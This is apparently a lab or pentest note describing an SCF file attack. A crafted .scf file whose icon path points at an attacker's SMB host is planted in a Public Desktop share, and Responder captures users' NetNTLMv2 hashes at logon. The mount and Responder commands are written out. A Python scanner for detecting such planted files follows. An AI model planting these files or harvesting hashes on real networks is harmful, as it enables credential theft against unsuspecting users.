SMB - SCF (Shell Command Files) File Attacks (NetNTLMv2 hash (challenge) grab)




[Shell]
Command=2
IconFile=\\X.X.X.X\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop


Create a file named steal_hash.scf with the above contents, replacing X.X.X.X with the attacker's IP address.



Next, upload the file into the Desktop folder within the Public folders.
The Public/Desktop folder is accessed every time any user logs in.
Therefore, when a user logs in, the icon is requested from our attacking box,
the attacker sends a challenge, and a challenge response is then returned to us:
the NetNTLMv2 hash.


Upload the file like so...

mount -t cifs '//10.10.10.103/Department shares' -o username=amanda /mnt



If we have a readable and mountable SMB share that contains Public, then we can add
the file there, combining the two attacks together.


 



Next, start Responder; only very basic settings are needed.


responder -I tun0


Now wait for a user to log in, and we should see the NetNTLMv2 hash :-)
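
On the defensive side, planted files of this kind can be found by scanning shares and the Public folders for .scf files in which any key points at a UNC path. The following is an added example, not part of the original post; the function names and the 192.0.2.10 sample address are assumptions made for illustration.

```python
import os
import re
import sys

# UNC target such as \\host\share\file or //host/share/file; captures the host.
UNC_RE = re.compile(r'^\s*(?:\\\\|//)([^\\/\s]+)[\\/]')

def remote_refs(scf_text):
    """Return (section, key, host) for every key whose value is a UNC path."""
    hits, section = [], None
    for raw in scf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('[') and line.endswith(']'):
            section = line[1:-1]
            continue
        key, sep, value = line.partition('=')
        match = UNC_RE.match(value) if sep else None
        if match:
            hits.append((section, key.strip(), match.group(1)))
    return hits

def decode(data):
    """SCF files are normally ANSI text, but tolerate a UTF-16 BOM."""
    if data[:2] in (b'\xff\xfe', b'\xfe\xff'):
        return data.decode('utf-16', errors='replace')
    return data.decode('latin-1')

def scan_tree(root):
    """Walk root and list every .scf file that references a remote host."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith('.scf'):
                path = os.path.join(dirpath, name)
                with open(path, 'rb') as fh:
                    refs = remote_refs(decode(fh.read()))
                if refs:
                    findings.append((path, refs))
    return findings

# Constructed sample: the file shown above with a documentation-range address.
SAMPLE = ("[Shell]\nCommand=2\nIconFile=\\\\192.0.2.10\\share\\pentestlab.ico\n"
          "[Taskbar]\nCommand=ToggleDesktop\n")

if __name__ == '__main__':
    print(remote_refs(SAMPLE))
    for path, refs in scan_tree(sys.argv[1] if len(sys.argv) > 1 else '.'):
        print(path, refs)
```

Run it against a mounted share or a user profile directory; any hit whose host is not an internal file server deserves a look, along with outbound SMB from that workstation around logon time.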
